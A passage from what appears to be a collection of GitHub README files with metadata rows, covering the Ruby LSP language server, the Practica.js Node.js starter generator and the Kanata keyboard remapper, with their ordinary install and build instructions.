- Fuzzy search classes, modules and constants anywhere in the project and its dependencies (workspace symbol)
Method support for definition, completion, hover and workspace symbol is partially implemented, but not yet complete. Follow progress in https://github.com/Shopify/ruby-lsp/issues/899
See complete information about features [here](https://shopify.github.io/ruby-lsp/RubyLsp/Requests.html).
If you experience issues, please see the [troubleshooting
guide](https://github.com/Shopify/ruby-lsp/blob/main/TROUBLESHOOTING.md).
## Usage
### With VS Code
If using VS Code, all you have to do is install the [Ruby LSP
extension](https://marketplace.visualstudio.com/items?itemName=Shopify.ruby-lsp) to get the extra features in the
editor. Do not install the `ruby-lsp` gem manually.
For more information on using and configuring the extension, see [vscode/README.md](vscode/README.md).
### With other editors
See [editors](EDITORS.md) for community instructions on setting up the Ruby LSP, which currently includes Emacs, Neovim, Sublime Text, and Zed.
The gem can be installed by doing
```shell
gem install ruby-lsp
```
and the language server can be launched by running `ruby-lsp` (without `bundle exec`, in order to properly hook into your
project's dependencies).
### Documentation
See the [documentation](https://shopify.github.io/ruby-lsp) for more in-depth details about the
[supported features](https://shopify.github.io/ruby-lsp/RubyLsp/Requests.html).
For creating rich themes for Ruby using the semantic highlighting information, see the [semantic highlighting
documentation](SEMANTIC_HIGHLIGHTING.md).
### Configuring code indexing
By default, the Ruby LSP indexes all Ruby files defined in the current project and all of its dependencies, including
default gems, except for
- Gems that only appear under the `:development` group
- All Ruby files under `test/**/*.rb`
By creating a `.index.yml` file, these configurations can be overridden and tuned. Note that indexing-dependent behavior, such as definition, hover, completion or workspace symbol, will be impacted by the configurations placed here.
```yaml
# Exclude files based on a given pattern. Often used to exclude test files or fixtures
excluded_patterns:
- "**/spec/**/*.rb"
# Include files based on a given pattern. Can be used to index Ruby files that use different extensions
included_patterns:
- "**/bin/*"
# Exclude gems by name. If a gem is never referenced in the project's code and is only used as a tool, excluding it will
# speed up indexing and reduce the amount of results in features like definition or completion
excluded_gems:
- rubocop
- pathname
# Include gems by name. Normally used to include development gems that are excluded by default
included_gems:
- prism
```
### Addons
The Ruby LSP provides an addon system that allows other gems to enhance the base functionality with more editor
features. This is the mechanism that powers addons like
- [Ruby LSP Rails](https://github.com/Shopify/ruby-lsp-rails)
- [Ruby LSP RSpec](https://github.com/st0012/ruby-lsp-rspec)
- [Ruby LSP rubyfmt](https://github.com/jscharf/ruby-lsp-rubyfmt)
Other community-driven addons can be found in [rubygems](https://rubygems.org/search?query=name%3A+ruby-lsp) by
searching for the `ruby-lsp` prefix.
For instructions on how to create addons, see the [addons documentation](ADDONS.md).
## Learn More
* [RubyConf 2022: Improving the development experience with language servers](https://www.youtube.com/watch?v=kEfXPTm1aCI) ([Vinicius Stock](https://github.com/vinistock))
* [Remote Ruby: Ruby Language Server with Vinicius Stock](https://remoteruby.com/221)
* [RubyKaigi 2023: Code indexing - How language servers understand our code](https://www.youtube.com/watch?v=ks3tQojSJLU) ([Vinicius Stock](https://github.com/vinistock))
## Contributing
Bug reports and pull requests are welcome on GitHub at https://github.com/Shopify/ruby-lsp. This project is intended to
be a safe, welcoming space for collaboration, and contributors are expected to adhere to the [Contributor
Covenant](CODE_OF_CONDUCT.md) code of conduct.
If you wish to contribute, see [CONTRIBUTING](CONTRIBUTING.md) for development instructions and check out our pinned
[roadmap issue](https://github.com/Shopify/ruby-lsp/issues) for a list of tasks to get started.
## License
The gem is available as open source under the terms of the [MIT License](LICENSE.txt).
| An opinionated language server for Ruby | lsp,ruby | 94 | 6,712 | 1,489 | 3,911 | 101 | 50 | 13 |
practicajs/practica | ![Best practices starter](/static/images/practica-logo.png)
<br/>
### Generate a Node.js app that is packed with best practices AND simplicity in mind. Based off our repo [Node.js best practices](https://github.com/goldbergyoni/nodebestpractices) (96,100 stars)
<br />
![Twitter](/static/images/twitter-icon.png) [Twitter](https://twitter.com/nodepractices) | ![Site](/docs/static/img/site-icon.png) [Documentation site](https://practica.dev/)
<br/>
# A One Paragraph Overview
Although Node.js has great frameworks 💚, they were never meant to be dev & production ready immediately (e.g., no architecture layers, DB schemas, docker file, etc etc). Practica.js aims to bridge the gap. Based on your preferred framework, we generate example code that demonstrates a full Microservice flow, from API to DB, that is packed with good practices. For example, we include a battle-tested error handler, sanitized API response, hardened dockerfile, thoughtful 3-tier folder structure, great testing templates with DB, and more. This saves a great deal of time and can prevent painful mistakes. All decisions made are [neatly and thoughtfully documented](https://practica.dev/decisions). We strive to keep things as simple and standard as possible and base our work on the popular guide: [Node.js Best Practices](https://github.com/goldbergyoni/nodebestpractices)
**1 min video 👇, ensure audio is activated**
https://user-images.githubusercontent.com/8571500/170464232-43355e43-98cf-4069-b9fc-6bc303a39efc.mp4
<br/>
# `Table of Contents`
- [`Super-Quick Setup`](#super-quick-setup)
- [`Our Philosophies and Unique Values`](#our-philosophies-and-unique-values)
- [`Practices and Features`](#practices-and-features)
- [`The People Behind Practica.js`](#the-people-behind-practicajs)
- [`Our best practices guide, 78,000 stars ✨`](https://github.com/goldbergyoni/nodebestpractices)
- [`Contribution guide`](https://github.com/practicajs/practica/blob/main/CONTRIBUTING.md)
- [`Documentation site`](https://practica.dev/)
- [`YouTube`](https://www.youtube.com/channel/UCKrSJ0-jm7YVTM_hO7Me9eA)
- Coming Soon:
- Example Applications
- [Express, PostgreSQL, with common best practices](https://github.com/practicajs/practica/blob/main/docs/not-ready-yet.md)
- [Express, mongo-db, with common best practices](https://github.com/practicajs/practica/blob/main/docs/not-ready-yet.md)
- [Express, PostgreSQL, with all best practices (advanced)](https://github.com/practicajs/practica/blob/main/docs/not-ready-yet.md)
- [Minimal with project setup configuration only](https://github.com/practicajs/practica/blob/main/docs/not-ready-yet.md)
<details><summary>More Flavours</summary>
- Fastify, PostgreSQL
- Fastify, mongo-db
- Generate Your Own Interactively
- More coming soon
</details>
<br />
# Super-Quick Setup
<br />
### Run Practica.js from the Command Line
Run practica CLI and generate our default app (you can customize it using different flags):
```bash
npx @practica/create-node-app immediate --install-dependencies
```
✨ And you're done! That's it, the code's all been generated. Our default setup includes Fastify for the web layer, Sequelize for data access, and PostgreSQL as the database.
Prefer express and Prisma? Just pass the right flags to the CLI:
```bash
npx @practica/create-node-app immediate --install-dependencies --web-framework=express --orm=prisma
```
Prefer another DB? We use standard ORMs; read their docs and switch the DB. This is your code, do whatever you like.
<br />
### Start the Project
```bash
cd {your chosen folder name}
npm install
```
Then choose whether to start the app:
```bash
npm run
```
or run the tests:
```bash
npm test
```
Pretty straightforward, right?
You just got a Node.js Monorepo solution with one example component/Microservice and multiple libraries. Based on this hardened solution you can build a robust application. The example component/Microservice is located under: *{your chosen folder name}/services/order-service*. This is where you'll find the API and a good spot to start your journey from
<br />
### Next Steps
- ✅ Start coding. The code we generate is minimal by design and based on known libraries. This should help you get up to speed quickly.
- ✅ Read our ['coding with practica'](https://practica.dev/the-basics/coding-with-practica/) guide
- ✅ Master it by reading our [docs at https://practica.dev](https://practica.dev).
<br />
# Our Philosophies and Unique Values
### 1. Best Practices _on top of_ known Node.js frameworks
We don't re-invent the wheel. Rather, we use your favorite framework and empower it with structure and real examples. With a single command you can get an Express/Fastify-based codebase with many thoughtful best practices inside
![Built on top of known frameworks](/static/images/on-top-of-frameworks.png)
### 2. Simplicity, how Node.js was intended
Keeping it simple, flat, and based on native Node/JS capabilities is part of this project's DNA. We believe that too many abstractions, high complexity, or fancy language features can quickly become a stumbling block for the team.
To name a few examples, our code flow is flat with almost no level of indirection and no DI - it's just simple functions calling other functions. Although we use TypeScript, almost no features are used besides types; for modularization we simply use... Node.js modules.
![Simplicity!](/static/images/abstractions-vs-simplicity.png)
### 3. Supports many technologies and frameworks
Good Practices and Simplicity is the name of the game with Practica. There is no need to narrow our code to a specific framework or database. We aim to support the popular Node.js frameworks and data access approaches
![Built on top of known frameworks](/static/images/tech-stack.png)
<br />
# Practices and Features
We apply dozens of practices and optimizations. You can opt in or out of most of these features using option flags on our CLI. The following table lists just a few examples out of the [full list of features we provide](https://practicajs.org/features).
| **Feature** | **Explanation** | **Flag** | **Docs** |
| ----------- | --------------- | -------- | -------- |
| Monorepo setup | Generates two components (e.g., Microservices) in a single repository with interactions between the two | --mr, --monorepo | [Docs here]() |
| Output escaping and sanitizing | Clean-out outgoing responses from potential HTML security risks like XSS | --oe, --output-escape | [Docs here]() |
| Integration (component) testing | Generates full-blown component/integration tests setup including DB | --t, --tests | [Docs here]() |
| Unique request ID (Correlation ID) | Generates module that creates a unique correlation/request ID for every incoming request. This is available for any other object during the request life-span. Internally it uses Node's built-in [AsyncLocalStorage](https://nodejs.org/api/async_hooks.html#class-asynclocalstorage) | --coi, --correlation-id | [Docs here]() |
| Dockerfile | Generates dockerfile that embodies >20 best practices | --df, --docker-file | [Docs here]() |
| Strong-schema configuration | A configuration module that dynamically load run-time configuration keys and includes a strong schema so it can fail fast | Built-in with basic app | [Docs here](https://github.com/bestpractices/practica/blob/main/docs/decisions/configuration-library.MD) |
📗 **See our full list of features [here](https://practica.dev/features)**
<br />
# The People Behind Practica.js
## Steering Committee
Practica is a community-driven open-source project. It's led voluntarily by engineers from many different companies. The companies below are just a few of those that encourage their engineers to contribute and keep this project moving. 💚
![Autodesk](/static/images/autodesk.png)
A Nasdaq 100 company, a world leader in design software
![Cox2m](/static/images/cox2m.png)
A leading IoT provider, part of 'Cox Communications', the 3rd largest cable company in the US
## Core Team
<table width="700px">
<tr>
<td align="center"><img src="./static/images/yoni.jpeg" width="300px" alt=""/><br /><h3>Yoni Goldberg</h3><br/>Independent Node.js consultant<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
<td align="center"><img src="./static/images/michael1.jpg" width="300px" alt=""/><br /><h3>Michael Solomon</h3><br/>Node.js lead<br/><a href="https://twitter.com/JMichaelShlomo"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
</td>
</tr>
<tr>
<td align="center"><img src="./static/images/raz.jpeg" width="300px" alt=""/><br /><h3>Raz Luvaton</h3><br/>Node.js developer<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
<td align="center"><img src="./static/images/daniel.jpeg" width="300px" alt=""/><br /><h3>Daniel Gluskin</h3><br/>Node.js lead<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
</tr>
<tr>
<td align="center"><img src="./static/images/ariel.jpeg" width="300px" alt=""/><br /><h3>Ariel Steiner</h3><br/>Node.js developer<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
<td align="center"><img src="./static/images/tomer.jpeg" width="300px" alt=""/><br /><h3>Tomer Kohane</h3><br/>Frontend geek<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
</tr>
<tr>
<td align="center"><img src="./static/images/dan.png" width="300px" alt=""/><br /><h3>Dan Goldberg</h3><br/>Node.js lead<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
<td align="center"><img src="./static/images/ron.jpeg" width="300px" alt=""/><br /><h3>Ron Dahan</h3><br/>Node.js expert<br/><a href="https://twitter.com/goldbergyoni"><img src="./static/images/twitter-symbol.png" width="16" height="16"></img></a>
<a href="https://goldbergyoni.com"><img src="./static/images/site-symbol.png" width="16" height="16"></img></a>
</td>
</tr>
</table>
<br />
# Partners
These companies are keen on continuous improvement, and their engineers have been known to contribute during work hours.
![Minta](/static/images/minta.png)
## Our Amazing Contributors 💚
A million thanks to these great people who have contributed code to our project:
<!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section -->
<!-- prettier-ignore-start -->
<!-- markdownlint-disable -->
<table>
<tbody>
<tr>
<td align="center" valign="top" width="25%"><a href="https://www.clarkio.com"><img src="https://avatars.githubusercontent.com/u/6265396?v=4?s=200" width="200px;" alt="Brian Clark"/><br /><sub><b>Brian Clark</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=clarkio" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/rluvaton"><img src="https://avatars.githubusercontent.com/u/16746759?v=4?s=200" width="200px;" alt="Raz Luvaton"/><br /><sub><b>Raz Luvaton</b></sub></a><br /><a href="#content-rluvaton" title="Content">🖋</a> <a href="https://github.com/practicajs/practica/commits?author=rluvaton" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/mikicho"><img src="https://avatars.githubusercontent.com/u/11459632?v=4?s=200" width="200px;" alt="Michael Solomon"/><br /><sub><b>Michael Solomon</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=mikicho" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/itainoam"><img src="https://avatars.githubusercontent.com/u/12605830?v=4?s=200" width="200px;" alt="itainoam"/><br /><sub><b>itainoam</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=itainoam" title="Code">💻</a> <a href="#projectManagement-itainoam" title="Project Management">📆</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/shanizlo"><img src="https://avatars.githubusercontent.com/u/39856071?v=4?s=200" width="200px;" alt="shanizlo"/><br /><sub><b>shanizlo</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=shanizlo" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/RonDaha"><img src="https://avatars.githubusercontent.com/u/30000700?v=4?s=200" width="200px;" alt="Ron Dahan"/><br /><sub><b>Ron Dahan</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=RonDaha" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/alonkishoni"><img src="https://avatars.githubusercontent.com/u/49868301?v=4?s=200" width="200px;" alt="AlonK"/><br /><sub><b>AlonK</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=alonkishoni" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://twitter.com/joseluah53"><img src="https://avatars.githubusercontent.com/u/11966345?v=4?s=200" width="200px;" alt="Jose Luis Alvarez Herrera"/><br /><sub><b>Jose Luis Alvarez Herrera</b></sub></a><br /><a href="#content-jalvar53" title="Content">🖋</a> <a href="https://github.com/practicajs/practica/commits?author=jalvar53" title="Code">💻</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/reinaldo-calderon-team"><img src="https://avatars.githubusercontent.com/u/60945397?v=4?s=200" width="200px;" alt="reinaldo-calderon-team"/><br /><sub><b>reinaldo-calderon-team</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=reinaldo-calderon-team" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/KarelVerschraegen"><img src="https://avatars.githubusercontent.com/u/11301291?v=4?s=200" width="200px;" alt="KarelVerschraegen"/><br /><sub><b>KarelVerschraegen</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=KarelVerschraegen" title="Documentation">📖</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/danm"><img src="https://avatars.githubusercontent.com/u/6394846?v=4?s=200" width="200px;" alt="Daniel Morrison"/><br /><sub><b>Daniel Morrison</b></sub></a><br /><a href="#content-danm" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/seanlowe"><img src="https://avatars.githubusercontent.com/u/35589586?v=4?s=200" width="200px;" alt="Sean Lowe"/><br /><sub><b>Sean Lowe</b></sub></a><br /><a href="#example-seanlowe" title="Examples">💡</a> <a href="#content-seanlowe" title="Content">🖋</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/idobetesh"><img src="https://avatars.githubusercontent.com/u/58806763?v=4?s=200" width="200px;" alt="idobetesh"/><br /><sub><b>idobetesh</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=idobetesh" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/alejaacosta17"><img src="https://avatars.githubusercontent.com/u/89855093?v=4?s=200" width="200px;" alt="Alejandra Acosta"/><br /><sub><b>Alejandra Acosta</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=alejaacosta17" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/adandanielteamint"><img src="https://avatars.githubusercontent.com/u/104020188?v=4?s=200" width="200px;" alt="adandanielteamint"/><br /><sub><b>adandanielteamint</b></sub></a><br /><a href="#content-adandanielteamint" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/rashad612"><img src="https://avatars.githubusercontent.com/u/251991?v=4?s=200" width="200px;" alt="Rashad Majali"/><br /><sub><b>Rashad Majali</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=rashad612" title="Code">💻</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/yohai-zv"><img src="https://avatars.githubusercontent.com/u/57675671?v=4?s=200" width="200px;" alt="yohai zvuloon"/><br /><sub><b>yohai zvuloon</b></sub></a><br /><a href="#content-yohai-zv" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://yonatankra.com"><img src="https://avatars.githubusercontent.com/u/6459899?v=4?s=200" width="200px;" alt="Yonatan Kra"/><br /><sub><b>Yonatan Kra</b></sub></a><br /><a href="#content-YonatanKra" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/yoni-rapoport"><img src="https://avatars.githubusercontent.com/u/16318253?v=4?s=200" width="200px;" alt="Yoni Rapoport"/><br /><sub><b>Yoni Rapoport</b></sub></a><br /><a href="#content-yoni-rapoport" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/perilevy"><img src="https://avatars.githubusercontent.com/u/29686391?v=4?s=200" width="200px;" alt="perilevy"/><br /><sub><b>perilevy</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=perilevy" title="Code">💻</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/ToMer-K"><img src="https://avatars.githubusercontent.com/u/18401157?v=4?s=200" width="200px;" alt="ToMer-K"/><br /><sub><b>ToMer-K</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=ToMer-K" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/henarbel"><img src="https://avatars.githubusercontent.com/u/87380400?v=4?s=200" width="200px;" alt="hen arbel"/><br /><sub><b>hen arbel</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=henarbel" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/mojcaostir"><img src="https://avatars.githubusercontent.com/u/34694446?v=4?s=200" width="200px;" alt="Mojca Ostir"/><br /><sub><b>Mojca Ostir</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=mojcaostir" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/evbambly"><img src="https://avatars.githubusercontent.com/u/45696895?v=4?s=200" width="200px;" alt="evbambly"/><br /><sub><b>evbambly</b></sub></a><br /><a href="#content-evbambly" title="Content">🖋</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/AmirAdarGit"><img src="https://avatars.githubusercontent.com/u/44618095?v=4?s=200" width="200px;" alt="Amir Adar"/><br /><sub><b>Amir Adar</b></sub></a><br /><a href="#content-AmirAdarGit" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://vaucouleur.com"><img src="https://avatars.githubusercontent.com/u/12293?v=4?s=200" width="200px;" alt="Sebastien Vaucouleur"/><br /><sub><b>Sebastien Vaucouleur</b></sub></a><br /><a href="#content-vaucouleur" title="Content">🖋</a></td>
<td align="center" valign="top" width="25%"><a href="https://hkdobrev.com"><img src="https://avatars.githubusercontent.com/u/506129?v=4?s=200" width="200px;" alt="Harry Dobrev"/><br /><sub><b>Harry Dobrev</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=hkdobrev" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://skippednote.dev"><img src="https://avatars.githubusercontent.com/u/2114712?v=4?s=200" width="200px;" alt="Bassam Ismail"/><br /><sub><b>Bassam Ismail</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=skippednote" title="Documentation">📖</a></td>
</tr>
<tr>
<td align="center" valign="top" width="25%"><a href="https://github.com/marcosmol204"><img src="https://avatars.githubusercontent.com/u/53741892?v=4?s=200" width="200px;" alt="Marcos Molina"/><br /><sub><b>Marcos Molina</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=marcosmol204" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/isenkasa"><img src="https://avatars.githubusercontent.com/u/65561129?v=4?s=200" width="200px;" alt="Isen Kasa"/><br /><sub><b>Isen Kasa</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=isenkasa" title="Code">💻</a></td>
<td align="center" valign="top" width="25%"><a href="https://github.com/vishal-sharma-369"><img src="https://avatars.githubusercontent.com/u/106011641?v=4?s=200" width="200px;" alt="Vishal Sharma"/><br /><sub><b>Vishal Sharma</b></sub></a><br /><a href="https://github.com/practicajs/practica/commits?author=vishal-sharma-369" title="Code">💻</a></td>
</tr>
</tbody>
</table>
<!-- markdownlint-restore -->
<!-- prettier-ignore-end -->
<!-- ALL-CONTRIBUTORS-LIST:END -->
| Node.js solution starter boilerplate that is production-ready, packed with ✅ best practices and built with simplicity in mind | nodejs,best-practices,express,fastify,postgresql,mongodb,boilerplate,starter-kit,hacktoberfest | 0 | 38 | 241 | 849 | 55 | 59 | 6 |
jtroo/kanata | <h1 align="center">Kanata</h1>
<h3 align="center">
<img
alt="Image of a keycap with the letter K on it in pink tones"
title="Kanata"
height="160"
src="assets/kanata-icon.svg"
/>
</h3>
<div align="center">
Improve your keyboard comfort
</div>
## What does this do?
This is a cross-platform software keyboard remapper for Linux, macOS and Windows. A short summary of
the features:
- multiple layers of key functionality
- advanced key behaviour customization (e.g. tap-hold, macros, unicode)
- cross-platform human readable configuration file
Check out the [examples directory](./cfg_samples)
and the [online simulator](https://jtroo.github.io).
To see all of the features, see the [configuration guide](./docs/config.adoc).
The configuration guide aims to be up-to-date with main and may have features not in your version.
See the applicable link in the [releases page](https://github.com/jtroo/kanata/releases).
The most similar project is [kmonad](https://github.com/kmonad/kmonad),
which served as the inspiration for kanata. [Here's a comparison document](./docs/kmonad_comparison.md).
You can see a [list of known issues here](./docs/platform-known-issues.adoc).
### Demo video
[Showcase of multi-layer functionality (30s, 1.7 MB)](https://user-images.githubusercontent.com/6634136/183001314-f64a7e26-4129-4f20-bf26-7165a6e02c38.mp4).
## Why is this useful?
Imagine if, instead of pressing Shift to type uppercase letters, we had giant
keyboards with separate keys for lowercase and uppercase letters. I hope we can
all agree: that would be a terrible user experience!
A way to think of how Shift keys work is that they switch your input to another
layer of functionality where you now type uppercase letters and symbols
instead of lowercase letters and numbers.
What kanata allows you to do is take this alternate layer concept that Shift
keys have and apply it to any key. You can then customize what those layers do
to suit your exact needs and workflows.
## Usage
Running kanata currently does not start it in a background process.
You will need to keep the window that starts kanata running to keep kanata active.
Some tips for running kanata in the background:
- Windows: https://github.com/jtroo/kanata/discussions/193
- Linux: https://github.com/jtroo/kanata/discussions/130
- Run from tray icon: [kanata-tray](https://github.com/rszyma/kanata-tray)
### Pre-built executables
See the
[releases page](https://github.com/jtroo/kanata/releases)
for executables and instructions.
### Build it yourself
This project uses the latest Rust stable toolchain. If you installed the
Rust toolchain using `rustup`, e.g. by using the instructions from the
[official website](https://www.rust-lang.org/learn/get-started),
you can get the latest stable toolchain with `rustup update stable`.
<details>
<summary>Instructions</summary>
Using `cargo install`:
cargo install kanata
# On Linux and macOS, this may not work without `sudo`, see below
kanata --cfg <your_configuration_file>
Build and run yourself in Linux:
git clone https://github.com/jtroo/kanata && cd kanata
cargo build # --release optional, not really perf sensitive
# sudo is used because kanata opens /dev/ files
#
# See below if you want to avoid needing sudo:
# https://github.com/jtroo/kanata/wiki/Avoid-using-sudo-on-Linux
sudo target/debug/kanata --cfg <your_configuration_file>
Build and run yourself in Windows:
git clone https://github.com/jtroo/kanata; cd kanata
cargo build # --release optional, not really perf sensitive
target\debug\kanata --cfg <your_configuration_file>
Build and run yourself in macOS:
For macOS version 11 and newer: Install the [Karabiner VirtualHiDDevice Driver](https://github.com/pqrs-org/Karabiner-DriverKit-VirtualHIDDevice/blob/main/dist/Karabiner-DriverKit-VirtualHIDDevice-3.1.0.pkg).
To activate it:
`/Applications/.Karabiner-VirtualHIDDevice-Manager.app/Contents/MacOS/Karabiner-VirtualHIDDevice-Manager activate`
For macOS version 10 and older:
Install the [Karabiner kernel extension](https://github.com/pqrs-org/Karabiner-VirtualHIDDevice).
git clone https://github.com/jtroo/kanata && cd kanata
cargo build # --release optional, not really perf sensitive
# sudo is needed to gain permission to intercept the keyboard
sudo target/debug/kanata --cfg <your_configuration_file>
The full configuration guide is [found here](./docs/config.adoc).
Sample configuration files are found in [cfg_samples](./cfg_samples). The
[simple.kbd](./cfg_samples/simple.kbd) file contains a basic configuration file
that is hopefully easy to understand but does not contain all features. The
`kanata.kbd` contains an example of all features with documentation. The
release assets also have a `kanata.kbd` file that is tested to work with that
release. All key names can be found in the [keys module](./src/keys/mod.rs),
and you can also define your own key names.
</details>
### Feature flags
When either building yourself or using `cargo install`,
you can add feature flags that
enable functionality that is turned off by default.
<details>
<summary>Instructions</summary>
If you want to enable the `cmd` actions,
add the flag `--features cmd`.
For example:
```
cargo build --release --features cmd
cargo install --features cmd
```
On Windows,
if you want to compile a binary that uses the Interception driver,
you should add the flag `--features interception_driver`.
For example:
```
cargo build --release --features interception_driver
cargo install --features interception_driver
```
To combine multiple flags,
use a single `--features` flag
and use a comma to separate the features.
For example:
```
cargo build --release --features cmd,interception_driver
cargo install --features cmd,interception_driver
```
</details>
## Other installation methods
[![Packaging status](https://repology.org/badge/vertical-allrepos/kanata.svg)](https://repology.org/project/kanata/versions)
## Notable features
- Human readable configuration file.
- [Minimal example](./cfg_samples/minimal.kbd)
- [Full guide](./docs/config.adoc)
- [Simple example with explanations](./cfg_samples/simple.kbd)
- [All features showcase](./cfg_samples/kanata.kbd)
- Live reloading of the configuration for easy testing of your changes.
- Multiple layers of key functionality
- Advanced actions such as tap-hold, unicode output, dynamic and static macros
- Vim-like leader sequences to execute other actions
- Optionally run a TCP server to interact with other programs
- Other programs can respond to [layer changes or trigger layer changes](https://github.com/jtroo/kanata/issues/47)
- [Interception driver](http://www.oblita.com/interception) support (use `kanata_wintercept.exe`)
- Note that this issue exists, which is outside the control of this project:
https://github.com/oblitum/Interception/issues/25
## Contributing
Contributions are welcome!
Unless explicitly stated otherwise, your contributions to kanata will be made
under the LGPL-3.0-only[*] license.
Some directories are exceptions:
- [keyberon](./keyberon): MIT License
- [interception](./interception): MIT or Apache-2.0 Licenses
[Here's a basic low-effort design doc of kanata](./docs/design.md)
[*]: https://www.gnu.org/licenses/identify-licenses-clearly.html
## How you can help
- Try it out and let me know what you think. Feel free to file an issue or
start a discussion.
- Usability issues and unhelpful error messages are considered bugs that should
be fixed. If you encounter any, I would be thankful if you file an issue.
- Browse the open issues and help out if you are able and/or would like to. If
you want to try contributing, feel free to ping jtroo for some pointers.
- If you know anything about writing a keyboard driver for Windows, starting an
open-source alternative to the Interception driver would be lovely.
## Community projects related to kanata
- [vscode-kanata](https://github.com/rszyma/vscode-kanata): Language support for kanata configuration files in VS Code
- [komokana](https://github.com/LGUG2Z/komokana): Automatic application-aware layer switching for [`komorebi`](https://github.com/LGUG2Z/komorebi) (Windows)
- [kanata-tray](https://github.com/rszyma/kanata-tray): Control kanata from a tray icon
- Application-aware layer switching:
- [qanata (Linux)](https://github.com/veyxov/qanata)
- [kanawin (Windows)](https://github.com/Aqaao/kanawin)
- [window_tools (Windows)](https://github.com/reidprichard/window_tools)
## What does the name mean?
I wanted a "k" word since this relates to keyboards. According to Wikipedia,
kanata is an indigenous Iroquoian word meaning "village" or "settlement" and is
the origin of Canada's name.
There's also PPT✧.
## Motivation
TLDR: QMK features but for any keyboard, not just fancy mechanical ones.
<details>
<summary>Long version</summary>
I have a few keyboards that run [QMK](https://docs.qmk.fm/#/). QMK allows the
user to customize the functionality of their keyboard to their heart's content.
One great use case of QMK is its ability map keys so that they overlap with the
home row keys but are accessible on another layer. I won't comment on
productivity, but I find this greatly helps with my keyboard comfort.
For example, these keys are on the right side of the keyboard:
7 8 9
u i o
j k l
m , .
On one layer I have arrow keys in the same position, and on another layer I
have a numpad.
arrows: numpad:
- - - 7 8 9
- ↑ - 4 5 6
← ↓ → 1 2 3
- - - 0 * .
One could add as many customizations as one likes to improve comfort, speed,
etc. Personally my main motivator is comfort due to a repetitive strain injury
in the past.
However, QMK doesn't run everywhere. In fact, it doesn't run on **most**
hardware you can get. You can't get it to run on a laptop keyboard or any
mainstream office keyboard. I believe that the comfort and empowerment QMK
provides should be available to anyone with a computer on their existing
hardware, instead of having to purchase an enthusiast mechanical keyboard
(which are admittedly very nice — I own a few — but can be costly).
The best alternative solution that I found for keyboards that don't run QMK was
